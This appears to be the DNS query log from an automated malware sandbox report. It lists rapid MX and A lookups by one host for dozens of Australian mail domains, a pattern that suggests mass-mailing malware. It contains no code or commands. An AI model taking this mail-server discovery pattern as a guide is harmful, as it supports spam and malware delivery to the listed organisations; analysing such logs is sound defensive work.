                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.151115894 CET192.168.2.38.8.8.80xc786Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.160887003 CET192.168.2.38.8.8.80x7352Standard query (0)websurf.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.236546040 CET192.168.2.38.8.8.80x9ea6Standard query (0)creativeelements.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.258243084 CET192.168.2.38.8.8.80xc354Standard query (0)act-gov-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.323479891 CET192.168.2.38.8.8.80x532eStandard query (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.350579023 CET192.168.2.38.8.8.80x1b15Standard query (0)extmail.bpbb.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.368561029 CET192.168.2.38.8.8.80xc20aStandard query (0)creativeelements-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.570792913 CET192.168.2.38.8.8.80x45f4Standard query (0)theforce.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.596004009 CET192.168.2.38.8.8.80xfc7bStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.733221054 CET192.168.2.38.8.8.80x43a4Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.733654976 CET192.168.2.38.8.8.80x7ac4Standard query (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.760732889 CET192.168.2.38.8.8.80xfef0Standard query (0)asav2.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.805517912 CET192.168.2.38.8.8.80xab0eStandard query (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.836261034 CET192.168.2.38.8.8.80x25deStandard query (0)extmail.bpbb.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.885013103 CET192.168.2.38.8.8.80xf465Standard query (0)dingoblue.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.936323881 CET192.168.2.38.8.8.80xeab6Standard query (0)mx-2.planetozi.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.936323881 CET192.168.2.38.8.8.80x96f2Standard query (0)mail.theforce.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.953820944 CET192.168.2.38.8.8.80x587cStandard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.976934910 CET192.168.2.38.8.8.80x5c7cStandard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.016928911 CET192.168.2.38.8.8.80xcb9cStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.037664890 CET192.168.2.38.8.8.80xb509Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.112024069 CET192.168.2.38.8.8.80x5f6bStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.130898952 CET192.168.2.38.8.8.80x995cStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.206999063 CET192.168.2.38.8.8.80x1917Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.228794098 CET192.168.2.38.8.8.80xc2afStandard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.265609026 CET192.168.2.38.8.8.80x23a8Standard query (0)transmin.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.284465075 CET192.168.2.38.8.8.80xf392Standard query (0)transmin-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.348557949 CET192.168.2.38.8.8.80xe95cStandard query (0)optusnet.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.421370029 CET192.168.2.38.8.8.80xec11Standard query (0)hockingstuart.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.537926912 CET192.168.2.38.8.8.80x49e4Standard query (0)hockingstuart-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.595169067 CET192.168.2.38.8.8.80xe2e4Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.615498066 CET192.168.2.38.8.8.80x755Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.647639990 CET192.168.2.38.8.8.80x39e6Standard query (0)mail2.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.677011967 CET192.168.2.38.8.8.80xe4e5Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.698025942 CET192.168.2.38.8.8.80x41eeStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.766119003 CET192.168.2.38.8.8.80x2c65Standard query (0)education.nsw.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.844019890 CET192.168.2.38.8.8.80x50f1Standard query (0)bmcl.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.943290949 CET192.168.2.38.8.8.80xf54aStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.032697916 CET192.168.2.38.8.8.80xf1d5Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.376255989 CET192.168.2.38.8.8.80x94e8Standard query (0)alt3.aspmx.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.376751900 CET192.168.2.38.8.8.80xd83cStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.385303974 CET192.168.2.38.8.8.80xdaecStandard query (0)aflpa.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.399039030 CET192.168.2.38.8.8.80xbb82Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.630116940 CET192.168.2.38.8.8.80x7da8Standard query (0)mail.aflpa.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.645517111 CET192.168.2.38.8.8.80x3953Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.675769091 CET192.168.2.38.8.8.80xfacbStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.738817930 CET192.168.2.38.8.8.80x7891Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.764250040 CET192.168.2.38.8.8.80x6642Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.856331110 CET192.168.2.38.8.8.80x409fStandard query (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.889513016 CET192.168.2.38.8.8.80xe6d2Standard query (0)stonedesign.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.891271114 CET192.168.2.38.8.8.80x4400Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.971506119 CET192.168.2.38.8.8.80xc34Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.997132063 CET192.168.2.38.8.8.80x56afStandard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:31.074295998 CET192.168.2.38.8.8.80x72d0Standard query (0)aqis.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:31.114891052 CET192.168.2.38.8.8.80x2e35Standard query (0)d505367.a.ess.au.barracudanetworks.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:31.710575104 CET192.168.2.38.8.8.80x6076Standard query (0)cgs.act.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:31.824676991 CET192.168.2.38.8.8.80x2f50Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:31.849199057 CET192.168.2.38.8.8.80xcceeStandard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:31.923101902 CET192.168.2.38.8.8.80x6b66Standard query (0)cardno.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:32.042814016 CET192.168.2.38.8.8.80xf27fStandard query (0)mxa-0028c002.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:33.889151096 CET192.168.2.38.8.8.80x6076Standard query (0)cgs.act.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:33.926767111 CET192.168.2.38.8.8.80x817dStandard query (0)colaccollege.vic.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:33.928009987 CET192.168.2.38.8.8.80xc9c6Standard query (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:33.951323032 CET192.168.2.38.8.8.80x944fStandard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:34.004600048 CET192.168.2.38.8.8.80x1b6Standard query (0)baonline.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:34.076832056 CET192.168.2.38.8.8.80x56d3Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:34.097261906 CET192.168.2.38.8.8.80x4098Standard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:34.157270908 CET192.168.2.38.8.8.80x39fStandard query (0)iird.vic.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:34.273112059 CET192.168.2.38.8.8.80x6faeStandard query (0)vodafone.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:34.441545010 CET192.168.2.38.8.8.80x1f69Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:34.532747030 CET192.168.2.38.8.8.80xffdeStandard query (0)sttherese.catholic.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:34.578035116 CET192.168.2.38.8.8.80x97bcStandard query (0)au-smtp-inbound-2.mimecast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:34.643260956 CET192.168.2.38.8.8.80x51fbStandard query (0)artmob.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:34.645267010 CET192.168.2.38.8.8.80xabf5Standard query (0)cgs-act-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:34.705457926 CET192.168.2.38.8.8.80x51f9Standard query (0)fortimail02.wide.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:34.722629070 CET192.168.2.38.8.8.80x6beStandard query (0)artmob-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:34.751326084 CET192.168.2.38.8.8.80x86e6Standard query (0)eq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:34.771672010 CET192.168.2.38.8.8.80xe79aStandard query (0)eq-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.056766987 CET192.168.2.38.8.8.80x1a03Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.077663898 CET192.168.2.38.8.8.80xd1dStandard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.115101099 CET192.168.2.38.8.8.80x5b45Standard query (0)csiro.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.134347916 CET192.168.2.38.8.8.80xa673Standard query (0)act-mx.csiro.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.205612898 CET192.168.2.38.8.8.80x6f6Standard query (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.237834930 CET192.168.2.38.8.8.80xb5f6Standard query (0)asav2.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.271491051 CET192.168.2.38.8.8.80x5960Standard query (0)nuk.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.324208975 CET192.168.2.38.8.8.80x7117Standard query (0)us-smtp-inbound-1.mimecast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.379163027 CET192.168.2.38.8.8.80xe2ecStandard query (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.399969101 CET192.168.2.38.8.8.80x56ecStandard query (0)extmail.bpbb.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.431880951 CET192.168.2.38.8.8.80x1f69Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.459886074 CET192.168.2.38.8.8.80xc9b7Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.495313883 CET192.168.2.38.8.8.80x96beStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.516731977 CET192.168.2.38.8.8.80x49a7Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.577917099 CET192.168.2.38.8.8.80x39f6Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.600503922 CET192.168.2.38.8.8.80x596cStandard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.684847116 CET192.168.2.38.8.8.80x4110Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.804141045 CET192.168.2.38.8.8.80xe6f8Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.805331945 CET192.168.2.38.8.8.80x8afaStandard query (0)netspace.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.827405930 CET192.168.2.38.8.8.80x5c7aStandard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.834292889 CET192.168.2.38.8.8.80x1633Standard query (0)education.nsw.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.924361944 CET192.168.2.38.8.8.80xed21Standard query (0)uow.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.010045052 CET192.168.2.38.8.8.80xd9c1Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.028935909 CET192.168.2.38.8.8.80x1205Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.087243080 CET192.168.2.38.8.8.80xf5adStandard query (0)health.qld.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.161179066 CET192.168.2.38.8.8.80xec86Standard query (0)alt4.aspmx.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.174762964 CET192.168.2.38.8.8.80xb06eStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.193636894 CET192.168.2.38.8.8.80x43cdStandard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.224740028 CET192.168.2.38.8.8.80x8b1Standard query (0)au-smtp-inbound-2.mimecast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.265516043 CET192.168.2.38.8.8.80x1d88Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.288867950 CET192.168.2.38.8.8.80x777aStandard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.357975006 CET192.168.2.38.8.8.80x59b2Standard query (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.376277924 CET192.168.2.38.8.8.80x86e4Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.418977976 CET192.168.2.38.8.8.80x1e13Standard query (0)smtp6.health.qld.gov.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.467078924 CET192.168.2.38.8.8.80x2d96Standard query (0)ozemail.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.487185001 CET192.168.2.38.8.8.80x94e3Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.534346104 CET192.168.2.38.8.8.80xb512Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.555077076 CET192.168.2.38.8.8.80x8db0Standard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.593127966 CET192.168.2.38.8.8.80xdbb2Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.617741108 CET192.168.2.38.8.8.80x8812Standard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.655807972 CET192.168.2.38.8.8.80x956aStandard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.675920963 CET192.168.2.38.8.8.80xc28fStandard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.738823891 CET192.168.2.38.8.8.80x2e88Standard query (0)eq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.830396891 CET192.168.2.38.8.8.80x9139Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.849101067 CET192.168.2.38.8.8.80x27bStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.903414965 CET192.168.2.38.8.8.80xaa95Standard query (0)aapt.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.963994980 CET192.168.2.38.8.8.80x30aStandard query (0)eq-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.982275963 CET192.168.2.38.8.8.80x253dStandard query (0)saracen.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.064483881 CET192.168.2.38.8.8.80x2b79Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.085047960 CET192.168.2.38.8.8.80x70bcStandard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.106703997 CET192.168.2.38.8.8.80x5ee6Standard query (0)saracen-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.122889042 CET192.168.2.38.8.8.80x480dStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.141407967 CET192.168.2.38.8.8.80x93f7Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.201008081 CET192.168.2.38.8.8.80x3b7bStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.221398115 CET192.168.2.38.8.8.80xccbdStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.281938076 CET192.168.2.38.8.8.80xb711Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.300709963 CET192.168.2.38.8.8.80x6f73Standard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.359204054 CET192.168.2.38.8.8.80xfb0dStandard query (0)brigidine.nsw.edu.au493394047487887MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.439248085 CET192.168.2.38.8.8.80x1db4Standard query (0)riverside.qld.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.493464947 CET192.168.2.38.8.8.80x94e3Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.543044090 CET192.168.2.38.8.8.80x5cacStandard query (0)mbc.qld.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.607345104 CET192.168.2.38.8.8.80x2bbStandard query (0)mbc-qld-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.623178005 CET192.168.2.38.8.8.80x1a85Standard query (0)adam.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.648436069 CET192.168.2.38.8.8.80x317eStandard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.687849998 CET192.168.2.38.8.8.80xdf80Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.715820074 CET192.168.2.38.8.8.80x407Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.763462067 CET192.168.2.38.8.8.80x5227Standard query (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.784379959 CET192.168.2.38.8.8.80x2cb0Standard query (0)extmail.bpbb.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.786063910 CET192.168.2.38.8.8.80x7dceStandard query (0)riverside-qld-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.865201950 CET192.168.2.38.8.8.80x6202Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.885284901 CET192.168.2.38.8.8.80x4257Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.974123955 CET192.168.2.38.8.8.80xf5c9Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.992257118 CET192.168.2.38.8.8.80x8e1eStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.076741934 CET192.168.2.38.8.8.80x994dStandard query (0)aapt.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.097728968 CET192.168.2.38.8.8.80x9de2Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.160166025 CET192.168.2.38.8.8.80x13daStandard query (0)starbank.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.269252062 CET192.168.2.38.8.8.80x4d39Standard query (0)mail.donvale.vic.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.343717098 CET192.168.2.38.8.8.80x274Standard query (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.364221096 CET192.168.2.38.8.8.80xd5d2Standard query (0)extmail.bpbb.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.392451048 CET192.168.2.38.8.8.80xba78Standard query (0)mx.starbank.com.au.cust.a.hostedemail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.414853096 CET192.168.2.38.8.8.80xfcb4Standard query (0)evandavis.id.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.570089102 CET192.168.2.38.8.8.80x4a93Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.591481924 CET192.168.2.38.8.8.80x35ccStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.656153917 CET192.168.2.38.8.8.80x1713Standard query (0)plandevel.auth.grMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.728033066 CET192.168.2.38.8.8.80x7a37Standard query (0)aanet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.747512102 CET192.168.2.38.8.8.80xc22eStandard query (0)mx1.eftel.comA (IP address)IN (0x0001)false
